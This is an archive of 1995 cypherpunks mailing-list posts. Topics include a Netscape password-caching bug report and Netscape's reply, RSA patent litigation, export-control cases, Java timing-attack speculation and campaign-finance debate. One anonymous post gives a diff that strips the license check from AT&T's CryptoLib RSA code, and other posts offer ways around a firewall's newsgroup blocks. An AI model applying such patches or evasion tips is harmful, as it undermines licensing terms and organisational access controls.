> instance.

Hahahahahahahah!!!!!!!!!! A cryptographer's most POWERFUL weapon, is
A False Sense of Security... If you've read Kocher's abstract, you
would NO DOUBT realize that there are ALWAYS options to be explored
and exploited. I'm sorry, don't take it personal, but I think that this
'til the end o' time' argument leaks like a "sieve"... it's the classic
linear thinking thing.

> It would have made a great DES cracker, though; my
> back-of-the-envelope calculation has it cracking one key every
> .75 days on the average.

This sounds pretty pessimistic too...

> thad

> -- Thaddeus Beier                   email:  thad@hammerhead.com
>    Technology Development             vox:  408) 286-3376
>    Hammerhead Productions             fax:  408) 292-2244
> 
> ----------

Well... maybe the timing wasn't right for the system's completion.
After all, designing a computer with <1 nanosecond cycle time is not
child's play. And in quantity it is even more difficult. A few more
years of development with Transphaser logic and Holographic storage
could work some wonders in computational capailities.

Anitro





- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMNXt+SoZzwIn1bdtAQEQAQF/YKCYcSiH4BRswP7+4Sv1VIYynpH738vF
LFa/31pQBJiEkmkpiykmOcL3YySghGsf
=3nUQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 19 Dec 1995 11:58:27 +0800
To: trei@process.com>
Subject: Re: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b
In-Reply-To: <9512190026.AA15461@toad.com>
Message-ID: <Pine.ULT.3.91.951218173620.29934E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Except for the bit about the file not being deleted after quitting
Netscape (which is Bad), this is old news. This is why security-conscious
sites like banking.wellsfargo.com ask for passwords in an SSL-encrypted
form rather than via simple browser authentication. 

Even if Netscape did delete the "password cache," anyone with physical 
access to your machine could still recover it from disk.

I believe that Microsoft Internet Explorer and other browsers derived from
Mosaic do the same thing. 

Netscape et al know that simple browser authentication is of limited 
usefulness, which is why we keep trying to commit them to DCE.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Tue, 19 Dec 1995 10:27:18 +0800
To: cypherpunks@toad.com
Subject: RSA Data v. Cylink hearing
Message-ID: <rschlafly3530146400>
MIME-Version: 1.0
Content-Type: text/plain


Another hearing in the public-key patent saga.

Cylink/CKC is going for a preliminary injunction against RSA Data
for contributory infringement of the Stanford patents.

RSA Data has a license to the Stanford patents, but has no sublicensing
authority.  It has been selling RSA & Diffie-Hellman toolkits and
telling customers that they don't need PKP or Stanford patent
licenses, and even indemnifying those customers against a patent
infringement claim.

An arbiter has already ruled that RSA Data's license does not cover
customers shipping products.

Of course I take the position that these patents are invalid, and
now that Bidzos has lost control of them, he suddenly agrees with me.
(Sorry, no ruling yet in my case.  Stay tuned.)  But RSA Data lawyers
will have to stand up in court and say that after enforcing the
Stanford patent against all public-key users for 5 years, RSA Data
suddenly had a revelation that the Stanford patents are invalid
after all.  It should be amusing.

2:00 pm, Thurs., Jan. 4, 1996
RSA Data v. Cylink/CKC, Case C-95-03256 WHO
SF Federal Bldg, court #7, Judge Orrick
450 Golden Gate Ave
Directions: Take 9th up from Market -- it turns into Larkin and
the federal bldg is on the corner with Golden Gate Ave.
docket clerk: 415-522-2060

Roger Schlafly

	phone: 408-476-3550
	CompuServe: 76646,323
	US Mail: PO Box 1680, Soquel, CA 95073 USA
	Internet: rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 19 Dec 1995 09:32:23 +0800
To: cypherpunks@toad.com
Subject: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b
Message-ID: <9512190026.AA15461@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Haven't had time to test this myself.

Peter Trei

------- Forwarded Message Follows -------
Date:          Mon, 18 Dec 95 17:18:28
From:          <lstein@genome.wi.mit.edu>
Subject:       SECURITY ALERT: Password protection bug in Netscape 2.0b3
To:            www-security@ns2.rutgers.edu, jcarroll@redman.canada.dg.com
Cc:            tara@linkage.cpmc.columbia.edu

A potentially serious bug has just come to my attention concerning the
handling of password-protected pages accessed via Netscape 2.0b3.
Apparently when you type in the password to access a protected document
Netscape stores the password in a local hidden file (in one of the .db
files created in the .netscape directory on UNIX systems, and in the
Netscape Preferences file on Macintoshes).  This password is then used for
accessing the document during subsequent accesses.  The problem is that
Netscape does not delete the stored password when the program quits.

The problem has been reproduced on Unix and Macintosh platforms.  I haven't
tried the Windows implementation yet, but I suspect the same problem
exists.

This leads to the following behavior:

        1) Open up Netscape and access a password-protected document.
        2) Quit Netscape
        3) Start Netscape again and try to retrieve the document.  When the
                password-entry dialog comes up, click "Cancel".
        4) Try to access the document a second time.  Now Netscape lets you
                in without asking for the password!

On Unix systems, this means that if you go over to a associate's machine to
show him a protected document, Netscape will record your typed in password
for posterity.  Your associate now has full access to this page.

The situation is particularly dangerous on PCs in a shared "computer lab"
environment.  Everybody who uses Netscape unwittingly makes his passwords
available to all other users.

Please let me know if anyone finds out more about this problem.  I'm going
to add it to the WWW security FAQ.

Lincoln

========================================================================
Lincoln Stein, M.D.,Ph.D.                       lstein@genome.wi.mit.edu
Director: Informatics Core
MIT Genome Center                               (617) 252-1916
Whitehead Institute for Biomedical Research     (617) 252-1902 FAX
One Kendall Square
Cambridge, MA 02139
=================http://www-genome.wi.mit.edu/~lstein====================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Dec 1995 21:02:52 +0800
To: cypherpunks@toad.com
Subject: Re: Political Cleanup program [NOISE]
Message-ID: <199512190442.UAA14637@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I was going to refrain from ranting on this one (for once:-) but 
a couple points with cypherpunks relevance have come up.
One is that PACs are, in some sense, a donation-remailer.  
The purpose is to get the money to its destination while
obfuscating the link between the donor and the candidate,
while allowing the PACs to take the political heat for it,
but giving them the out that "it's just being done on behalf 
of our fine upstanding donors."

At 11:20 AM 12/18/95 -0500, Phill Hallam wrote (order rearranged somewhat):
>The starting point for campaign reform has to be to cap the amount that can be 
>spent on a campaign. Most countries have such laws to prevent the political 
>process from being owned by the rich. Unfortunately this has happened in
the US 
>with the effect that both parties are much further to the right than in any 
>other Western democracy. 

I happen to believe in freedom of speech, especially political speech,
and if you're not allowed to spend money broadcasting your speech or
printing your messages, you don't have much freedom of press or speech.
In this case, technology is giving us the ability to not only support
freedom of speech, but give it as little or as much visible linkage as desired,
allow the money to be passed around privately, and also to coordinate
publicity efforts of different groups in ways other than simply giving
cash to a candidate's bagman to be spent on publicity.  It's also
significantly changing the costs, speed, and targetability of speech,
allowing more people to get involved, and allowing low-cost efforts
to have more impact by reaching the right people.

And as far as "prevent the political process from being owned by the rich" 
goes, there have been brief exceptions over the last 5000 years in which
the less-rich have overthrown the rich, but campaign finance laws have almost
never kept the rich or the politicians from helping each other out.

>The main problem with anonymous political donations is that it is easy
enough to 
>create linkage if the recipient and the donor conspire together. 

That's a given; not much point in giving someone a bribe if they don't know
what they're being bribed to do or who they're doing it for :-)

>There are many other things that campaign laws are intended to achieve beyond 
>avoiding bribery. For example foreign nationals cannot make donations to US 
>parties. It would be a good thing if there were similar laws in the UK
since at 
>the last election a foreign national with links to organised crime alledghedly 
>made a multi million donation to the Conservative party. 

I also don't believe freedom of speech should be limited by national boundaries.

>Of course in the absence of full disclosure of details of party records
> nobody can be sure. We are as voters entitled to consider the worst however.

You can always agree not to vote for any candidate or party that doesn't
provide full disclosure, though it's a little harder to deal with political
publicity supporting a candidate provided directly by non-candidates.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# .... Heading back to The Big Phone Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Tue, 19 Dec 1995 21:03:07 +0800
To: cypherpunks@toad.com
Subject: New additions (12/18) for Karn vs State Dept
Message-ID: <199512190443.UAA23762@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


I've just received, HTMLized and added two new documents to the web page
concerning my case against the State Dept. They are:

http://www.qualcomm.com/people/pkarn/export/karnsf.html (Joint Statement
of Facts Not In Dispute, 12/18/95) and

http://www.qualcomm.com/people/pkarn/export/repmem.html (Reply
Memorandum In Further Support of Defendants' Motion to Dismiss, Or In
the Alternative, For Summary Judgment 12/18/95)

As before, the base URL for the case is

http://www.qualcomm.com/people/pkarn/export

I'd like to thank the government's attorneys at the Department of
Justice for this time providing an electronic copy of their filing to
my attorneys. This made it easier for me to bring it to you on the
web.

Last time I scanned in the government's documents on an OCR system,
the same one I used to scan in the 3DES code in Applied Cryptography
to demonstrate the process as part of my declaration.

However, I still had to convert the text files from WordPerfect to
ASCII and then HTMLize them by hand. If you find any formatting
errors, please let me know so I can fix them.

--Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 19 Dec 1995 11:32:52 +0800
To: dklur@dttus.com (David Klur)
Subject: Re: redirect of newsgroups
In-Reply-To: <9511188193.AA819305757@cc2.dttus.com>
Message-ID: <199512190221.VAA20286@homeport.org>
MIME-Version: 1.0
Content-Type: text


Yeah, buy an account on a local ISP, or on C2, got.net, or some other
cypherpunk run/supporting business.

Adam


|      For those of us sitting behind a firewall that blocks out all of the 
|      alt, rec, etc.. newsgroups...is there another way to access these 
|      groups?  For example, redirecting the contents of alt.2600 to, say, 
|      comp.2600 (because this firewall allows the comp.xxx groups through).  
|      Or any other hacks around this inconvenience?

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Dec 1995 13:02:43 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <acfb7cab020210041061@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:15 PM 12/18/95, Derek Atkins wrote:
>Correction of another detail:
>
>> > tcmay@got.net (Timothy C. May) writes:
>> > When you've done this, and concluded that RSA-129 could be done in, say, X
>> > minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
>> > group), and on to the 1024- and 2048-bit keys. Tell us how many years or
>> > centuries it will take. (Hint: Rivest and Schneier have done these
>
>RSA-129 is 129 decimal digits, not 129 bits.  This computes to about
>425 bits, which is actually more difficult than the 384-bit Blacknet
>key.

I'm not having much luck on this example, am I? The RSA-129 I remembered
correctly as being 129 decimal digits, but I spaced out on the 384-bit key
and mislabelled it as "RSA-384."

It'll be _many_ years before a 384-decimal-digit number is factored, I
suspect. Let alone a 600-digit modulus, with or without the mysterious
"transphaser" technology mentioned by Anitro.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Tue, 19 Dec 1995 11:50:59 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512182157.VAA32380@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Submitted for your approval...

The recent CryptoLib, offered by the nice folks at AT&T (Written by Jack
Lacy and Don Mitchell), has a small problem: folks without RSA licenses are
given a crippled version without functional RSA code. It sucks, but they 
must cover their collective asses.

That small problem has now been rectified.  

Is CryptoLib available overseas yet?

================================CUT HERE===================================

*** -	Sun Dec 17 20:05:50 1995
--- rsa.c	Sun Dec 17 20:05:36 1995
***************
*** 411,421 ****
  #endif
  {
  	BigInt result;
! 	fprintf(stderr, "RSA encryption not supported without license.\n");
! 	result = bigInit(0);
  	return result;
  }
- 
  #ifdef K_AND_R
  _TYPE( BigInt )
  RSADecrypt(message, key)
--- 411,420 ----
  #endif
  {
  	BigInt result;
!         result = bigInit(0);
!         bigPow(message, key->publicExponent, key->modulus, result);
  	return result;
  }
  #ifdef K_AND_R
  _TYPE( BigInt )
  RSADecrypt(message, key)
***************
*** 427,434 ****
  #endif
  {
  	BigInt result;
! 	fprintf(stderr, "RSA decryption not supported without license.\n");
! 	result = bigInit(0);
  	return result;
  	
  }
--- 426,433 ----
  #endif
  {
  	BigInt result;
!         result = bigInit(0);
!         chineseRemTheorem(message, key, result);
  	return result;
  	
  }





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 19 Dec 1995 16:12:02 +0800
To: Russ Cooper <rcooper@the-wire.com>
Subject: RE: Political Cleanup program
Message-ID: <m0tRvJf-0008zdC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:09 PM 12/17/95 -0500, you wrote:
>A much simpler solution might be to just force all politicians to give up 
>their campaign funds when they retire, or even better, immediately 
>following the elections. Today, whatever is left in their campaign funds 
>are given over to them when they retire or are forced out of office, on top 
>of their lucrative pensions.
>
For Congress, I think this changed a few years ago.  Before a certain date,
retiring Congressmen could convert unused campaign funds to their own money.
At some point they changed the rules, and that is no longer the case.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 19 Dec 1995 17:49:16 +0800
To: trei@process.com
Subject: Re: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b
In-Reply-To: <9512190026.AA15461@toad.com>
Message-ID: <30D65A4B.7ED1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


This report is mostly bogus.  Netscape does not, and never
has stored http auth passwords in files on your disk.  However
we do cache documents from servers that use http auth.
In this case the user had their preferences set to check the
host site for updated content "once per session".  There is
a bug, which we are fixing before 2.0 ships, that if the
auth fails the document should be removed from the cache but
was not. If the user had set their cache checking to "never",
then if the document is in the cache, it will always be shown to
the user, since no connection is made to the server.

  Content providers who don't want their web pages cached
should use the 'Pragma: no-cache' http header.  This will
tell the navigator to not save the document in the disk cache.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 19 Dec 1995 13:41:40 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: PGP's randpool()
Message-ID: <199512190326.WAA20676@homeport.org>
MIME-Version: 1.0
Content-Type: text



	What does PGP do when it exhausts randpool?

	I've scanned the source, and found some useful tidbits, but
RANDPOOLBITS seems limited to ~408 bytes.  I can invoke commands that
should exhaust PGP's randpool, but don't seem to.  Doing "pgp
+makerandom=4000000 foo" repeatedly seemingly would cause PGP to
prompt me to type in some random stuff, but it doesn't.

	I'm trying to see how pgp reacts to me taking all its random
bytes because I'm writing some shell scripts that use pgp to generate
random passphrases.  (This is a case where I don't think bunches of
system data are enough.)

	(Note to reporters who might be listening: This is an fairly
unusual invocation of PGP where a user would not interact with the
program at all to supply new randomness.  Its not an attack on PGP's
security in any interesting or newsworthy sense.)

random.c:
 * - Every time you run PGP, especially when responding to one of PGP's
 *   prompts, PGP samples the keystrokes for use as random numbers.
 *   It is a shame to throw this entropy (randomness) away just because
 *   there is no need for it in the current invocation of PGP

[... Further down...]

/*
 * Performs an accumulation of random bits.  As long as there are fewer bits
 * in the buffer than are needed (the number passed, plus pending bits),
 * prompt for more.
[heavily cut]

void
trueRandAccum(unsigned count)	/* Get this many random bits ready */
{
LANG("\nWe need to generate %u random bits.  This is done by measuring the\
\ntime intervals between your keystrokes.  Please enter some random text\
\non your keyboard until you hear the beep:\n"), count-trueRandBits);


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 19 Dec 1995 15:39:38 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Re: Java and timing info - second attempt
In-Reply-To: <9512190402.AA12992@bilbo.suite.com>
Message-ID: <30D65C32.4500@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Miller wrote:
> Would it be possible to create a Java applet that causes the client
> machine to sign or encrypt something with their private key, and then send
> back timing info?
> 
> For the answer to be YES a few things need to be true.  There needs to be
> some sort of standard crypto API in use that can be accessed by a Java
> script, and Java scripts need to be able to capture and send back timing
> info.  Does anyone on this list know enough about Java to know if it can
> do any of these things?

  In Netscape Navigator 2.0 Java and JavaScript do not have access
to crypto routines.  At some point in the future this will probably
change, but only after we understand the implications much better
than we do today.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Dec 1995 17:47:04 +0800
To: cypherpunks@toad.com
Subject: Re: Campaign Finance Reform
Message-ID: <acfb90b504021004c5b3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry that I haven't been following this "Campaign finance reform" thread,
but I did stop to read what Brian Davis said, and his point actually raises
an important game-theoretic issue which we haven't talked about in a while
(maybe because everyone has so internalized it as part of their gestalt
that they see no need to mention it...which I doubt).

At 7:55 PM 12/18/95, Brian Davis wrote:
>On Mon, 18 Dec 1995, jim bell wrote:

>> All of which raises numerous opportunities for sting operations against
>> politicians, done by individuals by procedures provided for under law.
>> Escrow (Okay, I know that's a dirty word around here, but...) an encrypted
>> statement of how you intend to run the sting, to be opened by the escrow
>> agent at some point in the future, explaining who you're going after and
>> how.  Make the contribution, keep evidence, and if you're successfull the
>> congressman goes to jail for a few years.
>
>
>The problem with the private investigation is that law enforcement may
>not believe you were an "innocent" citizen conducting an investigation.
>Remember the ABSCAM Congressman who contended he was conducting his own
>investigation ...

The "game-theoretic issue" is that of the "brilliant penny scam,"
well-known to grifters and con artists and cryptographers (and all good
cryptographers should be aware of cons and scams, as cryptography protocols
bear close resemblances to confidence games, or at least must cope with
them).

I claim that I have a "magic penny," or "brilliant penny," which can
predict which way the price of Netscape stock will move on the next day. I
deposit a sealed prediction of what my brilliant penny told me would
happen, with a reputable escrow agent. I invite investors to cast their lot
with me. On each day, I retrieve the sealed prediction and, voila!, it is
confirmed to be the truth.

Obviously, what I have done is to record predictions covering both
outcomes--Netscape going up and going down--but have conveniently only
retrieved the one I know matches the actual outcome.

(Sure, it's possible to think of some ways to get around this. Left as an
exercise for the student.)

The connection with Jim Bell's idea is obvious. Anyone planning a crime,
say, buying drugs (not a crime in my book, but that's another story), cooks
up a strategy to claim he was "investigating how easily drugs may be bought
on the streets of Minneapolis." He seals a letter to himself detailing how
his "expose" is to be run. If caught, he smugly says, "But I'm just doing a
story on how drugs may be bought. You'll find my description of my plans
sealed in an envelope with my lawyer." Not very convincing.

(The reason this is a variant of the brilliant penny scam is that the costs
of making the claim are low, and the ability to selectively reveal forces
the outcomes to match. Not convincing.)


>Escrowing what you intend to do could be seen as blackmail ammunition if
>the Congressman fails to produce.
>
>Unfortunately for the Cryptoanarchists (tm -- in more ways than one),
>absent law enforcement running the "sting" you are taking a risk of being
>stung yourself.


"Escrowing" where the access key is controlled by the party intending to do
something illegal--blackmail, drugs, etc.--falls into the category I just
described.

Though I'm not a lawyer, I rather suspect courts have looked askance at
such "covers of convenience" intended to be used as protection.

By the way, dramatically better protection is gotten--so I understand--if a
"legitimate" reporting assignment is involved. Thus, if a reporter is
assigned by her editor to try to buy a dime bag on the corner of 8th and
Artesia, and she somewhow gets caught, adequate proof can be produced to
ensure no prosecution occurs (this obviously depends on a lot of factors).

On the issue of bribing officials, there are of course all sorts of ways to
do this. Outright bribes will always be handled more carefully than "mere"
campaign contributions, which are only quasi-bribes.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 19 Dec 1995 19:06:45 +0800
To: Jeff Weinstein <Jim_Miller@bilbo.suite.com
Subject: Re: Java and timing info - second attempt
Message-ID: <199512190724.XAA10835@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 22:31 12/18/95 -0800, Jeff Weinstein wrote:
>  In Netscape Navigator 2.0 Java and JavaScript do not have access
>to crypto routines.  At some point in the future this will probably
>change, but only after we understand the implications much better
>than we do today.

More importantly for covert channel analysis, do they have access to good
clocks?  Access to a good clock could make a Java applet a good candidate
for the receiver in a generalized covert channel attack.  Access to both
process time and real-world time can give a good indication of load on the
processor, and might be needed for animation.  A transmitter could send by
using or not using the CPU.  (Installing the transmitter is left as an
excersize for the student. ;-) )

Who said that life was safe?


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 19 Dec 1995 16:56:28 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: wish list for Crypto++?
Message-ID: <Pine.SUN.3.91.951218232411.13713B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I am looking for suggestions for features to include in the next version 
of Crypto++ (current version is 1.1, you can find it at 
http://www.eskimo.com/~weidai/cryptlib.html).

Major additions already planned/implemented include speed improvements,
Safer (all the variations), and elliptic curve cryptosystems (over prime
fields as well as fields of characteristic 2).  There is also a good
chance that RSA will be added back, but I'm still waiting for the final
word from the RSADSI lawyer. 

What else do people want to see?

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Tue, 19 Dec 1995 17:46:14 +0800
To: cypherpunks@toad.com
Subject: Re: redirect of newsgroups
In-Reply-To: <199512190221.VAA20286@homeport.org>
Message-ID: <Pine.A32.3.91.951219003649.70364A-100000@navajo.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> |      For those of us sitting behind a firewall that blocks out all of the 
> |      alt, rec, etc.. newsgroups...is there another way to access these 
> |      groups?  For example, redirecting the contents of alt.2600 to, say, 
> |      comp.2600 (because this firewall allows the comp.xxx groups through).  
> |      Or any other hacks around this inconvenience?

( im gonna work this back onto topic.. just watch. :)  ) 

There is a rather lengthy FAQ that explains about a zillion different 
ways to get your paws on whichever newsgroups you desire. Its called
"How to Receive Banned News Groups FAQ" and you can find it at:

http://www.cen.uiuc.edu/~jg11772/banned-groups-faq.html

(here it comes..)

In addition to covering topics relating to finding what you want in the 
way of usenet news, it also has a pretty well thought out anti-censorship 
rant towards the end, and gives pointers to some open NNTP servers, 
and freenets where you can obtain free access to usenet news. There is 
also a short list of mail to news gateways, which is useful if you would 
like to post to usenet via a remailer (or if your sysadmin censors which 
groups you have access to).

(Ok.. maybe not totally on topic.. i tried.. blegh)

have a day.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 19 Dec 1995 16:43:51 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java and timing info - second attempt
In-Reply-To: <9512190402.AA12992@bilbo.suite.com>
Message-ID: <199512190712.CAA21135@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jim Miller writes:
> Combine this with some a standard crypto API for doing Web-based digital  
> signatures or authentication or encryption and you may begin to see some  
> possibilities.
> 
> Would it be possible to create a Java applet that causes the client  
> machine to sign or encrypt something with their private key, and then send  
> back timing info?
> 
> For the answer to be YES a few things need to be true.  There needs to be  
> some sort of standard crypto API in use that can be accessed by a Java  
> script, and Java scripts need to be able to capture and send back timing  
> info.  Does anyone on this list know enough about Java to know if it can  
> do any of these things?

[I've read a bit more about Java since you last asked the question, 
coincidentally, but I don't know a huge amount about it yet.]

I think this scenario is certainly possible, from a technical point of view.

Crypto APIs in general should force the user to be aware of how she is using 
her key material. Ultimately you can't save people from themselves. (One
of my favorite non sequiturs. ;)  User education helps. But just as users
are tricked by various social engineering methods into divulging their account
passphrases, so they can be duped into encrypting or signing for a stranger's 
timing pleasure. 

However, one would certainly hope that the crypto Java interfaces that get
written are designed to mask timing information in the wake of Kocher. In
fact, this is precisely the sort of thing "we" should consider promulgating....

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Tue, 19 Dec 1995 20:50:38 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Political Cleanup program [NOISE]
In-Reply-To: <199512190442.UAA14637@ix3.ix.netcom.com>
Message-ID: <Pine.3.89.9512190644.A19615-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Dec 1995, Bill Stewart wrote:
> I happen to believe in freedom of speech, especially political speech,
> and if you're not allowed to spend money broadcasting your speech or
> printing your messages, you don't have much freedom of press or speech.

This has somewhat undemocratic aspects when applied to political free 
speech. A person has ONE vote regardless of his wealth and as far as 
access to the political process this same principle must be maintained 
otherwise democracy is lost. 

At times freedoms for corporate entities and freedoms for individuals are 
at cross purposes, freedom for individuals must always be held in the 
higher position.

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 20 Dec 1995 14:04:14 +0800
To: win95netbugs@lists.Stanford.EDU
Subject: ANNOUNCE: Windows 95 .PWL Security "Functionality Enhancement"
Message-ID: <Pine.ULT.3.91.951214212331.10286D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have been instructed that it is not a bug fix; it is a "Functionality 
Enhancement." Please note headers before replying -- you're probably in a 
Bcc field.

The patch for the problem we started discussing on November 1st is dated
yesterday, but no one outside Microsoft appears to have seen it until
today. pr/password.htm started forwarding to the patch distribution page
some time between 2PM and 7:30PM Pacific Time today (yes, I had hit
"reload"). 

 http://www.microsoft.com/windows/software/mspwlupd.htm
 http://www.windows.microsoft.com/software/mspwlupd.htm

Anyone who uses passwords for just about anything -- network servers, 
dialup networking, remote registry services -- should get this patch.

For a rough start at a technical discussion of the problem that this 
patch is supposed to solve, see http://www.c2.org/hackmsoft/ or the 
gopher list archive below.

The Web page says it uses a 128-bit key. Intriguing. Anyone seen the CJR, 
or is Microsoft exempt?

Microsoft had told various people that the new security algorithm would be
published in advance and reviewed by outside security experts, but I have
not been able to verify this. 

This was supposed to affect Windows for Workgroups as well; anyone know 
anything about that?

- -rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNENt43DXUbM57SdAQG4xwP9EqXu5wXBOfpThtEUikqngrQNpe7RGKSv
FqNSlZnh6GKJff6zQnZ3GyH0lYU8Mg+ApJVmSeSxq3ApA5Oc+jTUW6B4RNm+bxfT
YBSThGmGbNNt948E/7oyXJdYVtWhuAleQtU7LxKNJfXoQlO/R05cc8O0zj7EiBR+
777AbiM201s=
=K2IQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JerelRobertson <jrober39@borg.com>
Date: Wed, 20 Dec 1995 13:59:14 +0800
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <199512150614.BAA05472@mail.borg.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey I want to get on this list.  How do I do it?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 20 Dec 1995 07:06:44 +0800
To: cypherpunks@toad.com
Subject: Re: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Message-ID: <199512191557.HAA10769@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Dec 1995, Ian Goldberg wrote:

> In article <199512151800.KAA11304@jobe.shell.portal.com>,
>  <anonymous-remailer@shell.portal.com> wrote:
> >On Mon, 11 Dec 1995, Michael Coates wrote:
> >
> >> PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
> >> Netscape Communications has awarded two software sleuths $1,000 each
> >> for finding security gaps in its Netscape Navigator 2.0 software.  The
> >> company also awarded gifts to 50 other contestants in its "Bugs Bounty" 
> >> program for identifying non-security problems.  (Wall Street Journal
